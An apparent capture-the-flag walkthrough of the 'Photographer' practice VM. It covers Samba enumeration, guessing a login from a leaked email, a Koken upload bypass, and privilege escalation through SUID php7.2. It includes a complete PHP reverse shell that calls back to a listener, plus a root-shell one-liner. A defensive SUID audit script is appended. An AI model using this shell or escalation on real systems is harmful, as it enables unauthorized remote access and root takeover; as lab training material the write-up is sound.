VM download link: click here

This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.

0x00 Information Gathering

Checking the VM gives its IP address: 192.168.237.132.

Scan the ports:

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18
MAC Address: 00:0C:29:C1:54:75 (VMware)
Service Info: Hosts: PHOTOGRAPHER, example.com

Wappalyzer identifies the CMS on ports 8000 and 80 as Koken. Its admin panel has a file upload vulnerability, but we cannot log in yet.

There is a suspicious shell.php:

There is an admin login page:

Enumerate with enum4linux. A share exists:

[+] Attempting to map shares on 192.168.237.132
//192.168.237.132/print$        Mapping: DENIED, Listing: N/A
//192.168.237.132/sambashare    Mapping: OK, Listing: OK
//192.168.237.132/IPC$  [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

There are two usernames: daisa and agi.

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\daisa (Local User)
S-1-22-1-1001 Unix User\agi (Local User)

0x01 Gaining Access

Try anonymous access to the share. It works and yields the file mailsent.txt plus a WordPress backup.

mailsent.txt:

Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

The mail gives the address daisa@photographer.com and the keywords Daisa, secret, babygirl and so on. After some tries, that email address with the password babygirl logs into the admin panel on port 8000.

Import content → upload the webshell → intercept the request → change the file extension

Copy the [Download File] link from the front end: the webshell has been uploaded successfully.

Got the contents of user.txt ^^

0x02 Privilege Escalation

Burp is awkward to work from, so move a reverse shell in. (If you ask: I clumsily deleted the shell that came with the box

<?php 
$ip = '192.168.237.131';
$port = '9982';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

Find all SUID executables on the system:

find / -user root -perm -4000 -print 2>/dev/null

php7.2 turns up. Looking it up:

We need it to run as root, so:

/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
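An added defender-side check, not part of the original write-up: it takes the output of the `find / -user root -perm -4000` command above and flags SUID root binaries that are interpreters or shells (like the php7.2 abused here) or that are missing from a baseline. The sample find output, the baseline set and the interpreter list are constructed assumptions.

```python
import os
import re

# Interpreters/shells that hand out root code execution when SUID root.
# php7.2 is the one this box relies on; the list is an assumption, extend as needed.
RISKY_BASENAMES = re.compile(
    r"^(php\d*(\.\d+)*|python\d*(\.\d+)*|perl\d*(\.\d+)*|ruby|node|"
    r"bash|sh|dash|zsh|vim|vi|nano|find|env|cp|mv|tee)$"
)

# Constructed baseline of SUID binaries a stock Ubuntu 16.04 image is expected to ship.
EXPECTED_SUID = {
    "/bin/ping", "/bin/su", "/bin/mount", "/bin/umount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/lib/openssh/ssh-keysign",
}

# Constructed find output modelled on the box; /opt/tools/helper is an invented extra.
SAMPLE_FIND_OUTPUT = """\
/bin/ping
/bin/su
/bin/mount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/php7.2
/usr/lib/openssh/ssh-keysign
/opt/tools/helper
"""

def classify_suid(paths):
    """Split SUID root paths into (risky interpreters/shells, not-in-baseline)."""
    risky, unexpected = [], []
    for p in (s.strip() for s in paths):
        if not p:
            continue
        if RISKY_BASENAMES.match(os.path.basename(p)):
            risky.append(p)
        elif p not in EXPECTED_SUID:
            unexpected.append(p)
    return risky, unexpected

def audit(find_output=SAMPLE_FIND_OUTPUT):
    """Run the check over raw find output; returns a dict for reporting."""
    risky, unexpected = classify_suid(find_output.splitlines())
    return {"risky": risky, "unexpected": unexpected}

if __name__ == "__main__":
    result = audit()
    for p in result["risky"]:
        print(f"[!] SUID interpreter/shell: {p}  (fix: chmod u-s {p})")
    for p in result["unexpected"]:
        print(f"[?] SUID binary not in baseline: {p}")
```

On a live host, pipe the real find output in (`find / -user root -perm -4000 2>/dev/null | python3 suid_audit.py` with a small stdin wrapper) and review every `[!]` line first.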

proof.txt is in the /root directory: